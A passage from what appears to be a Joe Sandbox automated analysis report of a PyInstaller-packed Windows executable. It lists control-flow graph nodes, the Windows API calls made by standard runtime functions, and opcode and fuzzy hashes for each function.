803->810 804->780 805->808 806->807 813 7ff70af0bdc7 806->813 816 7ff70af0beb8-7ff70af0bece call 7ff70af04f78 call 7ff70af04f58 807->816 817 7ff70af0bed3-7ff70af0bed6 807->817 818 7ff70af0bd73-7ff70af0bd7d call 7ff70af0a9b8 808->818 809->800 815 7ff70af0bd3f-7ff70af0bd61 ReadConsoleW 809->815 810->783 811 7ff70af0bcd3-7ff70af0bcdf 810->811 811->783 819 7ff70af0bce1-7ff70af0bce3 811->819 823 7ff70af0bdce-7ff70af0bde3 813->823 825 7ff70af0bd82-7ff70af0bd8c 815->825 826 7ff70af0bd63 GetLastError 815->826 816->808 820 7ff70af0bd69-7ff70af0bd6b call 7ff70af04eec 817->820 821 7ff70af0bedc-7ff70af0bede 817->821 818->765 819->783 830 7ff70af0bce5-7ff70af0bcf5 819->830 820->808 821->818 823->818 832 7ff70af0bde5-7ff70af0bdf0 823->832 825->823 826->820 830->783 836 7ff70af0be17-7ff70af0be1f 832->836 837 7ff70af0bdf2-7ff70af0be0b call 7ff70af0b6e4 832->837 841 7ff70af0be9b-7ff70af0bea8 call 7ff70af0b524 836->841 842 7ff70af0be21-7ff70af0be33 836->842 844 7ff70af0be10-7ff70af0be12 837->844 841->844 845 7ff70af0be8e-7ff70af0be96 842->845 846 7ff70af0be35 842->846 844->818 845->818 848 7ff70af0be3a-7ff70af0be41 846->848 849 7ff70af0be7d-7ff70af0be88 848->849 850 7ff70af0be43-7ff70af0be47 848->850 849->845 851 7ff70af0be49-7ff70af0be50 850->851 852 7ff70af0be63 850->852 851->852 853 7ff70af0be52-7ff70af0be56 851->853 854 7ff70af0be69-7ff70af0be79 852->854 853->852 855 7ff70af0be58-7ff70af0be61 853->855 854->848 856 7ff70af0be7b 854->856 855->854 856->845
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                                                      • Opcode ID: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
                                                                                                                                                                                                                                      • Instruction ID: d8be70a44356c56241386cfa9c8c11889fd9208444260b59396a007f57c0a65e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 07c5dcf76cbe3182a9f46e495b791f87a2923bbe72b553d2f04cfdf557d03735
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 63C1B123A0868681FB60BB15D840ABDE765EF81B80FD541B1EA9E87791DF7CF8458720
                                                                                                                                                                                                                                      Function 00007FF70AEF8760 Relevance: 10.6, APIs: 7, Instructions: 63COMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 995526605-0
                                                                                                                                                                                                                                      • Opcode ID: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
                                                                                                                                                                                                                                      • Instruction ID: 0264a41a53313091f6e2b0f701fc792eaff1be187ff13afab43d8562afb5d7a4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ccba17952e233d5b695068aab9421341a55ed3ebff0a2a14ee99ad80d8ea5500
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 56212F22A0C68382FB10BB55F85522AE7A0EF857A0FD04275EA6D43BE8DF6CE4458750
                                                                                                                                                                                                                                      Function 00007FF70AEF90E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00007FF70AEF8760: GetCurrentProcess.KERNEL32 ref: 00007FF70AEF8780
                                                                                                                                                                                                                                        • Part of subcall function 00007FF70AEF8760: OpenProcessToken.ADVAPI32 ref: 00007FF70AEF8793
                                                                                                                                                                                                                                        • Part of subcall function 00007FF70AEF8760: GetTokenInformation.KERNELBASE ref: 00007FF70AEF87B8
                                                                                                                                                                                                                                        • Part of subcall function 00007FF70AEF8760: GetLastError.KERNEL32 ref: 00007FF70AEF87C2
                                                                                                                                                                                                                                        • Part of subcall function 00007FF70AEF8760: GetTokenInformation.KERNELBASE ref: 00007FF70AEF8802
                                                                                                                                                                                                                                        • Part of subcall function 00007FF70AEF8760: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF70AEF881E
                                                                                                                                                                                                                                        • Part of subcall function 00007FF70AEF8760: CloseHandle.KERNEL32 ref: 00007FF70AEF8836
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,00007FF70AEF3C55), ref: 00007FF70AEF916C
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,00007FF70AEF3C55), ref: 00007FF70AEF9175
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                      • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                      • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                      • Opcode ID: 44a76ac2d965b652da6d7152683ffc914eb32e79e00aec7a7a922ce7c9633e88
                                                                                                                                                                                                                                      • Instruction ID: fcc7c71aa7b32041306b94bf076678539fb7cff762b83b3079e2d2c128a1ca8f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 44a76ac2d965b652da6d7152683ffc914eb32e79e00aec7a7a922ce7c9633e88
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BF212D22A0874281FB10BB20ED163EAA265EF88780FD540B5EA4D53796DF3CE9458760
                                                                                                                                                                                                                                      Function 00007FF70AF0CFD0 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 963 7ff70af0cfd0-7ff70af0cff5 964 7ff70af0cffb-7ff70af0cffe 963->964 965 7ff70af0d2c3 963->965 967 7ff70af0d037-7ff70af0d063 964->967 968 7ff70af0d000-7ff70af0d032 call 7ff70af0a884 964->968 966 7ff70af0d2c5-7ff70af0d2d5 965->966 970 7ff70af0d06e-7ff70af0d074 967->970 971 7ff70af0d065-7ff70af0d06c 967->971 968->966 972 7ff70af0d084-7ff70af0d099 call 7ff70af1398c 970->972 973 7ff70af0d076-7ff70af0d07f call 7ff70af0c390 970->973 971->968 971->970 978 7ff70af0d09f-7ff70af0d0a8 972->978 979 7ff70af0d1b3-7ff70af0d1bc 972->979 973->972 978->979 982 7ff70af0d0ae-7ff70af0d0b2 978->982 980 7ff70af0d1be-7ff70af0d1c4 979->980 981 7ff70af0d210-7ff70af0d235 WriteFile 979->981 985 7ff70af0d1fc-7ff70af0d20e call 7ff70af0ca88 980->985 986 7ff70af0d1c6-7ff70af0d1c9 980->986 983 7ff70af0d237-7ff70af0d23d GetLastError 981->983 984 7ff70af0d240 981->984 987 7ff70af0d0c3-7ff70af0d0ce 982->987 988 7ff70af0d0b4-7ff70af0d0bc call 7ff70af04830 982->988 983->984 989 7ff70af0d243 984->989 1004 7ff70af0d1a0-7ff70af0d1a7 985->1004 990 7ff70af0d1e8-7ff70af0d1fa call 7ff70af0cca8 986->990 991 7ff70af0d1cb-7ff70af0d1ce 986->991 993 7ff70af0d0df-7ff70af0d0f4 GetConsoleMode 987->993 994 7ff70af0d0d0-7ff70af0d0d9 987->994 988->987 996 7ff70af0d248 989->996 990->1004 997 7ff70af0d254-7ff70af0d25e 991->997 998 7ff70af0d1d4-7ff70af0d1e6 call 7ff70af0cb8c 991->998 1001 7ff70af0d0fa-7ff70af0d100 993->1001 1002 7ff70af0d1ac 993->1002 994->979 994->993 1005 7ff70af0d24d 996->1005 1006 7ff70af0d2bc-7ff70af0d2c1 997->1006 1007 7ff70af0d260-7ff70af0d265 997->1007 998->1004 1010 7ff70af0d189-7ff70af0d19b call 7ff70af0c610 1001->1010 1011 7ff70af0d106-7ff70af0d109 1001->1011 1002->979 1004->996 1005->997 1006->966 1015 7ff70af0d267-7ff70af0d26a 1007->1015 1016 7ff70af0d293-7ff70af0d29d 1007->1016 1010->1004 1013 7ff70af0d10b-7ff70af0d10e 1011->1013 1014 7ff70af0d114-7ff70af0d122 1011->1014 1013->1005 1013->1014 1020 7ff70af0d180-7ff70af0d184 1014->1020 1021 7ff70af0d124 1014->1021 1022 7ff70af0d26c-7ff70af0d27b 1015->1022 1023 7ff70af0d283-7ff70af0d28e call 7ff70af04f34 1015->1023 1018 7ff70af0d29f-7ff70af0d2a2 1016->1018 1019 7ff70af0d2a4-7ff70af0d2b3 1016->1019 1018->965 1018->1019 1019->1006 1020->989 1024 7ff70af0d128-7ff70af0d13f call 7ff70af13a58 1021->1024 1022->1023 1023->1016 1029 7ff70af0d177-7ff70af0d17d GetLastError 1024->1029 1030 7ff70af0d141-7ff70af0d14d 1024->1030 1029->1020 1031 7ff70af0d16c-7ff70af0d173 1030->1031 1032 7ff70af0d14f-7ff70af0d161 call 7ff70af13a58 1030->1032 1031->1020 1034 7ff70af0d175 1031->1034 1032->1029 1036 7ff70af0d163-7ff70af0d16a 1032->1036 1034->1024 1036->1031
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF70AF0CFBB), ref: 00007FF70AF0D0EC
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF70AF0CFBB), ref: 00007FF70AF0D177
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 953036326-0
                                                                                                                                                                                                                                      • Opcode ID: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                                                      • Instruction ID: 31c21cd6fb3c3dd9ea2fe5ff3d2b067b9f21b1c51533d4936ffe5fa6f984f78e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e58aef6e17acf8d0a0aea0d946e1cce7a25eacb923cf4c64ad3114965f560b8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5791B433F1865289F750AFA5DC40ABDABA0AF54B88F944179DE0E97685CF38F442C720
                                                                                                                                                                                                                                      Function 00007FF70AF05698 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1279662727-0
                                                                                                                                                                                                                                      • Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                                                      • Instruction ID: d8180f6def151326dbc1838c76f2bf16523ede016d29520c416496f25ee76b2a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5841A323E1878183F710AB20DA14779A660FF94794F508374EA9C43AD1DFACF5E08B20
                                                                                                                                                                                                                                      Function 00007FF70AEFCCAC Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3251591375-0
                                                                                                                                                                                                                                      • Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                                      • Instruction ID: d1609d965e06dc936c98098a51463899f5b44f64e64dc5ffb9316cd8e654285f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF313923E0910B45FA64BB24DC623BD9A91DF81388FE444B4D94D472D7EF2DF9058271
                                                                                                                                                                                                                                      Function 00007FF70AF09AA0 Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                                                                                                                      • Opcode ID: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
                                                                                                                                                                                                                                      • Instruction ID: 169c4b68ed5c495b2cfa806dae7e8f2c7d72f0b895a3ed861a5ac919cbb59411
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 230ddfbeb2cfdc83e04e02b0fbb537ff9f96aef2fd2a5ab3fdce6eee95276a48
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F6D09212B0874682FB183B71ECD95789251AF48B41F9524B8C81B96393EFBCF8498320
                                                                                                                                                                                                                                      Function 00007FF70AF001AC Relevance: 3.2, APIs: 2, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                                                                                      • Opcode ID: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                      • Instruction ID: 8904f91e918180b32b458b9785e52638a2be3ec1f5803303236cfd045378d9da
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e80cfa20b6c7ebf2f27a6dba6ddb06cb01cda21135ba71ef9e2cf3b7629ca058
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4751B463B0964286FB69BA25DC00F7AE291AF44BA4F944774DE6D877C5CF3CF5018620
                                                                                                                                                                                                                                      Function 00007FF70AF0C1A4 Relevance: 3.0, APIs: 2, Instructions: 46COMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2976181284-0
                                                                                                                                                                                                                                      • Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                                      • Instruction ID: 7d0dae6b50ed8ee86f9edc4d204c61f96a028eb310d78eca462451c161d14f38
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0611C163A18A8181EA10AB25EC04169E761BF45BF4FA44371EE7D8B7E9CF3CE4128740
                                                                                                                                                                                                                                      Function 00007FF70AF0A9B8 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(?,?,?,00007FF70AF12D92,?,?,?,00007FF70AF12DCF,?,?,00000000,00007FF70AF13295,?,?,?,00007FF70AF131C7), ref: 00007FF70AF0A9CE
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF70AF12D92,?,?,?,00007FF70AF12DCF,?,?,00000000,00007FF70AF13295,?,?,?,00007FF70AF131C7), ref: 00007FF70AF0A9D8
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff70aef0000_cmd.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 485612231-0
                                                                                                                                                                                                                                      • Opcode ID: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                                                      • Instruction ID: 94484a63634749b173e583ce56297fcc0ec0ea182ce31badd5ae874ae0314ab0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F6E0E653F0960292FF14BBB2DC5557991516F88781FC541B4D91DC63A2DF2CF9958330
                                                                                                                                                                                                                                      Function 00007FF70AF0ABC8 Relevance: 2.6, APIs: 2, Instructions: 59COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CloseHandle.KERNELBASE(?,?,?,00007FF70AF0AA45,?,?,00000000,00007FF70AF0AAFA), ref: 00007FF70AF0AC36
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00007FF70AF0AA45,?,?,00000000,00007FF70AF0AAFA), ref: 00007FF70AF0AC40
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2112390693.00007FF70AEF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF70AEF0000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112350768.00007FF70AEF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112437979.00007FF70AF1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112480687.00007FF70AF32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2112561787.00007FF70AF34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
